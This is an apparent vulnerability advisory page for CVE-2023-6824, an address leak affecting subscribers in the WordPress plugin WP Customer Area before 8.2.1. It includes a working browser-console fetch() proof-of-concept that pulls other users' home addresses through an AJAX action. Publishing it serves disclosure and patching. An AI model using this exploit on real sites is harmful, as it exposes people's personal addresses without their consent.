Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:A224B984-770A-4534-B689-0701B582B388HistoryJan 10, 2024 - 12:00 a.m.
WP Customer Area < 8.2.1 - Subscriber+ Account Address Leak
2024-01-1000:00:00
Krzysztof Zając (CERT PL)
31
wordpress
customer area
security breach
subscriber
address leak
0.0005 Low
EPSS
Percentile
18.3%
Description The plugin does not properly validates user capabilities in some of its AJAX actions, allowing any users to retrieve other user’s account address.
Run the below command in the developer console of the browser when being logged in the blog as a subscriber and on your own edit account page (https://example.com/customer-area/my-account/edit-account/):
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "action=cuar_load_address_from_owner&owner[type]=usr&owner[ids][]=__ADD_USER_ID__&address_id=home_address&cuar_nonce=" + document.querySelector('div.cuar-home-address input#cuar_nonce').value,
"method": "POST",
"mode": "cors",
"credentials": "include"
}).then((response) => {return response.text(); })
.then((data) => {
console.log(data);
});Related
prion
prion
Code injection
2024-01-16 16:15:00
cvelist
cvelist
CVE-2023-6824 WP Customer Area < 8.2.1 - Subscriber+ Account Address Leak
2024-01-16 15:57:00
wpvulndb
wpvulndb
WP Customer Area < 8.2.1 - Subscriber+ Account Address Leak
2024-01-10 00:00:00
nvd
nvd
CVE-2023-6824
2024-01-16 16:15:13
cve
cve
CVE-2023-6824
2024-01-16 16:15:13